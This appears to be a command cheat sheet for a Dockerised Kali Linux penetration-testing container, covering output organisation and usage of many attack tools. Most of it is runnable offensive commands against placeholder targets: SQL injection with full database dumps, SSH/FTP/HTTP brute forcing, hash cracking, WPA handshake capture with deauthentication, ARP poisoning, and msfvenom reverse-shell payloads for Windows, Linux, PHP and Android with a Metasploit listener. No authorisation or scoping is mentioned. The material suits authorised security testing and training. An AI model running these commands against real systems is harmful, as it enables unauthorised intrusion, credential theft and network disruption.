HOST                          CONTAINER
./shared/           <--->     /home/kaliuser/shared/
./wordlists/        <--->     /home/kaliuser/wordlists/

# Generate timestamp
TIMESTAMP=$(date +%Y%m%d_%H%M%S)

# Save with timestamp
docker exec kali nmap -sV 192.168.1.1 -oA /home/kaliuser/shared/nmap_scan_$TIMESTAMP

# Create organized directory structure
docker exec kali mkdir -p /home/kaliuser/shared/{nmap,gobuster,nikto,sqlmap,hydra,john,metasploit,wireless,forensics}

# Save to organized locations
docker exec kali nmap -sV target.com -oA /home/kaliuser/shared/nmap/scan_$(date +%Y%m%d_%H%M%S)
docker exec kali gobuster dir -u http://target.com -w /wordlist -o /home/kaliuser/shared/gobuster/target_$(date +%Y%m%d_%H%M%S).txt

FORMAT: {tool}_{target}_{type}_{timestamp}.{ext}

EXAMPLES:
- nmap_192.168.1.1_full_20260125_143022.xml
- gobuster_example.com_dirs_20260125_143022.txt
- nikto_target.com_vuln_20260125_143022.txt
- hydra_ssh_192.168.1.10_20260125_143022.txt
- john_hashes_cracked_20260125_143022.txt

# Pre-installed wordlists in container:
/usr/share/wordlists/rockyou.txt          # Most popular passwords (needs extraction)
/usr/share/wordlists/dirb/common.txt      # Common directories
/usr/share/seclists/                      # Full SecLists collection
/usr/share/wordlists/metasploit/          # Metasploit wordlists

# Extract rockyou (one-time operation)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz

# Use built-in wordlists
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target

# Generate custom wordlist and save to mounted volume
docker exec kali crunch 6 8 -o /home/kaliuser/wordlists/custom_6-8.txt
docker exec kali cewl http://target.com -w /home/kaliuser/wordlists/target_words.txt

# Custom wordlists appear in ./wordlists/ on host

# Create directory structure
docker exec kali mkdir -p /home/kaliuser/shared/recon/$(date +%Y%m%d)

# Host discovery with logging
docker exec kali bash -c 'nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/host_discovery_$(date +%H%M%S)'

# Port scan with logging
docker exec kali bash -c 'nmap -sV -p- 192.168.1.100 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/port_scan_192.168.1.100_$(date +%H%M%S)'

# Create web assessment directory
docker exec kali mkdir -p /home/kaliuser/shared/web/target.com

# Directory enumeration
docker exec kali gobuster dir -u http://target.com \
  -w /usr/share/wordlists/dirb/common.txt \
  -o /home/kaliuser/shared/web/target.com/gobuster_$(date +%Y%m%d_%H%M%S).txt

# Nikto scan
docker exec kali nikto -h http://target.com \
  -o /home/kaliuser/shared/web/target.com/nikto_$(date +%Y%m%d_%H%M%S).txt

# SQL injection testing
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch \
  --output-dir=/home/kaliuser/shared/web/target.com/sqlmap_$(date +%Y%m%d_%H%M%S)

# Create password cracking directory
docker exec kali mkdir -p /home/kaliuser/shared/passwords

# John the Ripper with logging
docker exec kali john /home/kaliuser/shared/passwords/hashes.txt \
  --wordlist=/usr/share/wordlists/rockyou.txt \
  > /home/kaliuser/shared/passwords/john_output_$(date +%Y%m%d_%H%M%S).txt

# Hydra brute force with logging
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  ssh://192.168.1.10 \
  -o /home/kaliuser/shared/passwords/hydra_ssh_$(date +%Y%m%d_%H%M%S).txt

# Create wireless directory
docker exec kali mkdir -p /home/kaliuser/shared/wireless

# Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF \
  -w /home/kaliuser/shared/wireless/capture_$(date +%Y%m%d_%H%M%S) wlan0mon

# Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt \
  /home/kaliuser/shared/wireless/capture_*.cap \
  | tee /home/kaliuser/shared/wireless/crack_result_$(date +%Y%m%d_%H%M%S).txt

# Create payloads directory
docker exec kali mkdir -p /home/kaliuser/shared/payloads

# Generate payload and save to shared volume
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f exe \
  -o /home/kaliuser/shared/payloads/payload_$(date +%Y%m%d_%H%M%S).exe

# Metasploit resource file logging
docker exec kali bash -c 'echo "spool /home/kaliuser/shared/payloads/msf_session_$(date +%Y%m%d_%H%M%S).log" > /tmp/msf.rc'

# View all saved results
ls -lh ./shared/

# View organized by date
tree ./shared/

# Search for specific scan
find ./shared/ -name "*nmap*" -type f

# Archive results
tar -czf pentest_results_$(date +%Y%m%d).tar.gz ./shared/

# Nmap
-oN file.txt        # Normal output
-oX file.xml        # XML output
-oA basename        # All formats (recommended)

# Gobuster
-o file.txt         # Output to file

# Nikto
-o file.txt         # Output to file

# SQLmap
--output-dir=path   # Output directory

# Hydra
-o file.txt         # Output to file

# John
> file.txt          # Redirect stdout

# Aircrack-ng
-w /path/to/file    # Output file (for airodump-ng)

# Metasploit
spool file.log      # Log session to file

# Start with VPN (recommended for anonymized testing)
docker-compose up -d

# Start without VPN (direct connection)
docker-compose up -d kali

# Build from scratch
docker-compose build

# Check status
docker-compose ps

# Execute single command
docker exec kali [tool] [options]

# Interactive shell
docker exec -it kali /bin/bash

# Copy files out
docker cp kali:/home/kaliuser/shared/scan.txt ./output/

# Copy files in
docker cp ./wordlist.txt kali:/home/kaliuser/shared/

# Stop container
docker stop kali

# Start existing container
docker start kali

# Remove container
docker rm kali

# View logs
docker logs kali

# Basic scan
docker exec kali nmap 192.168.1.1

# Service version detection
docker exec kali nmap -sV 192.168.1.1

# OS detection
docker exec kali nmap -O 192.168.1.1

# Comprehensive scan
docker exec kali nmap -sC -sV -O -p- 192.168.1.1

# Save results (ALWAYS use /home/kaliuser/shared/)
docker exec kali bash -c 'nmap -sV -oA /home/kaliuser/shared/nmap_scan_$(date +%Y%m%d_%H%M%S) 192.168.1.0/24'

# Scan specific ports
docker exec kali masscan 192.168.1.0/24 -p80,443,8080

# Scan all ports fast
docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000

# Save results
docker exec kali masscan 10.0.0.0/8 -p80 -oL /home/kaliuser/shared/masscan.txt

# Passive mode
docker exec kali netdiscover -p -i eth0

# Active mode with range
docker exec kali netdiscover -r 192.168.1.0/24

docker exec kali arp-scan --localnet
docker exec kali arp-scan 192.168.1.0/24

# Basic scan
docker exec kali nikto -h http://target.com

# SSL scan
docker exec kali nikto -h https://target.com -ssl

# Save results
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt

# Tuning options
docker exec kali nikto -h http://target.com -Tuning 123bde

# Default wordlist
docker exec kali dirb http://target.com

# Custom wordlist
docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt

# Save results
docker exec kali dirb http://target.com -o /home/kaliuser/shared/dirb.txt

# Extensions
docker exec kali dirb http://target.com -X .php,.html,.txt

# Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# DNS subdomain enumeration
docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt

# Virtual host discovery
docker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt

# Directory fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ

# Parameter fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt http://target.com/page?id=FUZZ

# POST data fuzzing
docker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login

# Basic test
docker exec kali sqlmap -u "http://target.com/page?id=1"

# POST request
docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test"

# Enumerate databases
docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs

# Dump database
docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump

# Full automation
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all

# Basic scan
docker exec kali wpscan --url http://target.com

# Enumerate users
docker exec kali wpscan --url http://target.com --enumerate u

# Enumerate plugins
docker exec kali wpscan --url http://target.com --enumerate p

# Aggressive scan
docker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe

# Basic scan
docker exec kali whatweb http://target.com

# Aggressive mode
docker exec kali whatweb -a 3 http://target.com

# Scan multiple URLs
docker exec kali whatweb -i /home/kaliuser/shared/urls.txt

# Crack with default wordlist
docker exec kali john /home/kaliuser/shared/hashes.txt

# Use rockyou wordlist
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /home/kaliuser/shared/hashes.txt

# Crack specific format
docker exec kali john --format=raw-md5 /home/kaliuser/shared/hashes.txt

# Show cracked passwords
docker exec kali john --show /home/kaliuser/shared/hashes.txt

# Incremental mode
docker exec kali john --incremental /home/kaliuser/shared/hashes.txt

# MD5 crack
docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# SHA256 crack
docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt

# Brute force
docker exec kali hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a

# Show results
docker exec kali hashcat -m 0 hashes.txt --show

# SSH brute force
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# HTTP POST form
docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

# FTP brute force
docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1

# Multiple protocols
docker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 ssh ftp http

# SSH attack
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh

# HTTP basic auth
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http

# Generate 6-8 character wordlist
docker exec kali crunch 6 8 -o /home/kaliuser/shared/wordlist.txt

# Custom charset
docker exec kali crunch 4 6 0123456789 -o /home/kaliuser/shared/numbers.txt

# Pattern-based
docker exec kali crunch 8 8 -t pass@@@@ -o /home/kaliuser/shared/pattern.txt

# Start monitor mode
docker exec kali airmon-ng start wlan0

# Capture packets
docker exec kali airodump-ng wlan0mon

# Capture specific network
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon

# Deauth attack
docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA handshake
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap

# Automatic WPA attack
docker exec kali wifite --wpa

# All attack types
docker exec kali wifite

# Specific target
docker exec kali wifite -i wlan0 --kill

docker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# Search all sources
docker exec kali theharvester -d target.com -b all

# Specific source
docker exec kali theharvester -d target.com -b google

# Save results
docker exec kali theharvester -d target.com -b all -f /home/kaliuser/shared/harvest

# Standard enumeration
docker exec kali dnsrecon -d target.com

# Zone transfer
docker exec kali dnsrecon -d target.com -a

# Brute force subdomains
docker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt

# Basic enumeration
docker exec kali sublist3r -d target.com

# Enable brute force
docker exec kali sublist3r -d target.com -b

# Save results
docker exec kali sublist3r -d target.com -o /home/kaliuser/shared/subdomains.txt

# Full enumeration
docker exec kali enum4linux -a 192.168.1.1

# User enumeration
docker exec kali enum4linux -U 192.168.1.1

# Share enumeration
docker exec kali enum4linux -S 192.168.1.1

# Full scan
docker exec kali dmitry -winsepo /home/kaliuser/shared/dmitry.txt target.com

# Subdomain search
docker exec kali dmitry -s target.com

# Start msfconsole
docker exec -it kali msfconsole

# Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /home/kaliuser/shared/payload.exe

# Search exploits
docker exec -it kali bash -c "echo 'search tomcat' | msfconsole -q"

# Run resource script
docker exec kali msfconsole -r /home/kaliuser/shared/script.rc

# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk

# Start SET
docker exec -it kali setoolkit

# Scan for embedded files
docker exec kali binwalk /home/kaliuser/shared/firmware.bin

# Extract files
docker exec kali binwalk -e /home/kaliuser/shared/firmware.bin

# Signature scan
docker exec kali binwalk --signature /home/kaliuser/shared/file.bin

# Recover all file types
docker exec kali foremost -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/recovered

# Specific file types
docker exec kali foremost -t jpg,png,pdf -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/

# Get image info
docker exec kali volatility -f /home/kaliuser/shared/memory.dump imageinfo

# List processes
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 pslist

# Dump process
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /home/kaliuser/shared/

# Basic extraction
docker exec kali strings /home/kaliuser/shared/binary > /home/kaliuser/shared/strings.txt

# Minimum length 10
docker exec kali strings -n 10 /home/kaliuser/shared/binary

# Unicode strings
docker exec kali strings -e l /home/kaliuser/shared/binary

# View metadata
docker exec kali exiftool /home/kaliuser/shared/image.jpg

# Remove all metadata
docker exec kali exiftool -all= /home/kaliuser/shared/image.jpg

# Batch process
docker exec kali exiftool /home/kaliuser/shared/*.jpg

# GUI mode (requires X11 forwarding)
docker exec -it kali ghidra

# Headless mode
docker exec kali analyzeHeadless /workspace /project -import /home/kaliuser/shared/binary.exe

# Open binary
docker exec -it kali r2 /home/kaliuser/shared/binary

# Analyze
docker exec -it kali bash -c "echo 'aaa; pdf' | r2 /home/kaliuser/shared/binary"

# Disassemble
docker exec kali r2 -c 'pd 10' /home/kaliuser/shared/binary

# Debug binary
docker exec -it kali gdb /home/kaliuser/shared/binary

# With PEDA
docker exec -it kali gdb -q /home/kaliuser/shared/binary

# Full audit
docker exec kali lynis audit system

# Quick scan
docker exec kali lynis audit system --quick

# Start OpenVAS (requires initialization)
docker exec kali openvas-start

# Capture on interface
docker exec kali tcpdump -i eth0

# Capture to file
docker exec kali tcpdump -i eth0 -w /home/kaliuser/shared/capture.pcap

# Read file
docker exec kali tcpdump -r /home/kaliuser/shared/capture.pcap

# Filter HTTP
docker exec kali tcpdump -i eth0 'tcp port 80'

# Capture packets
docker exec kali tshark -i eth0

# Capture to file
docker exec kali tshark -i eth0 -w /home/kaliuser/shared/capture.pcap

# Filter display
docker exec kali tshark -r /home/kaliuser/shared/capture.pcap -Y 'http.request'

# Text mode
docker exec -it kali ettercap -T -i eth0

# ARP poisoning
docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//

# Step 1: Discover live hosts
docker exec kali nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/hosts

# Step 2: Port scan discovered hosts
docker exec kali nmap -sV -p- -iL /home/kaliuser/shared/hosts.txt -oA /home/kaliuser/shared/ports

# Step 3: Enumerate services
docker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /home/kaliuser/shared/services

# Step 1: Identify web technologies
docker exec kali whatweb http://target.com

# Step 2: Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /home/kaliuser/shared/dirs.txt

# Step 3: Vulnerability scan
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt

# Step 4: Test for SQLi
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch

# Step 1: Generate wordlist
docker exec kali crunch 8 12 -t Pass@@@@ -o /home/kaliuser/shared/wordlist.txt

# Step 2: Crack hashes
docker exec kali john --wordlist=/home/kaliuser/shared/wordlist.txt /home/kaliuser/shared/hashes.txt

# Step 3: Network service brute force
docker exec kali hydra -L /home/kaliuser/shared/users.txt -P /home/kaliuser/shared/wordlist.txt ssh://192.168.1.1

# Step 1: Enable monitor mode
docker exec kali airmon-ng start wlan0

# Step 2: Scan networks
docker exec kali airodump-ng wlan0mon

# Step 3: Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon

# Step 4: Deauth clients
docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Step 5: Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap

# Step 1: Search for exploit
docker exec kali searchsploit apache 2.4.49

# Step 2: Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /home/kaliuser/shared/payload.exe

# Step 3: Setup listener in Metasploit
docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"

# Files are automatically available on both sides:
# Save in container → Appears in ./shared/ on host immediately
docker exec kali nmap -sV target -oA /home/kaliuser/shared/scan

# Access on host
cat ./shared/scan.nmap

# Add files from host → Available in container immediately
echo "target1.com" > ./shared/targets.txt
docker exec kali cat /home/kaliuser/shared/targets.txt

# Only use docker cp for non-mounted paths
docker cp kali:/tmp/some-file.txt ./
docker cp ./local-file.txt kali:/tmp/

# List available wordlists
docker exec kali find /usr/share/wordlists -type f

# Extract rockyou (if gzipped)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz

# Check logs
docker logs kali

# Remove and recreate
docker rm kali
docker run -d --name kali kali-comprehensive

# Use host network
docker run -d --name kali --network host kali-comprehensive

# Add network capabilities
docker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive

# Run as root (already default)
docker exec -u root kali [command]

# Fix workspace permissions
docker exec kali chmod -R 777 /workspace /results

# Initialize database
docker exec kali service postgresql start
docker exec kali msfdb init

# Check status
docker exec kali msfdb status

# ✅ CORRECT - Output saved to shared volume with timestamp
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S)'

# ❌ WRONG - Output not saved (lost on container restart)
docker exec kali nmap -sV target

# ✅ CORRECT - Redirect to shared volume
docker exec kali whatweb target.com | tee /home/kaliuser/shared/whatweb_$(date +%Y%m%d_%H%M%S).txt

# Standard output flags (always use /home/kaliuser/shared/)
-o /home/kaliuser/shared/file_$(date +%Y%m%d_%H%M%S).txt     # Generic output
-oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S)        # Nmap: all formats
-w /home/kaliuser/shared/capture_$(date +%Y%m%d_%H%M%S).pcap # Capture files

# Create directory structure
docker exec kali mkdir -p /home/kaliuser/shared/{nmap,web,passwords,wireless,exploitation}/$(date +%Y%m%d)

# Save to organized locations
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/nmap/$(date +%Y%m%d)/scan_$(date +%H%M%S)'

# Stop monitor mode
docker exec kali airmon-ng stop wlan0mon

# Clear temporary files
docker exec kali rm -rf /tmp/*

# Archive results
docker exec kali tar -czf /home/kaliuser/shared/assessment-$(date +%Y%m%d).tar.gz /home/kaliuser/shared/*.txt

docker exec kali nmap -sV -p- target

docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt

docker exec kali sqlmap -u "http://target/page?id=1" --batch

docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

docker exec kali hydra -l admin -P passwords.txt ssh://target

docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap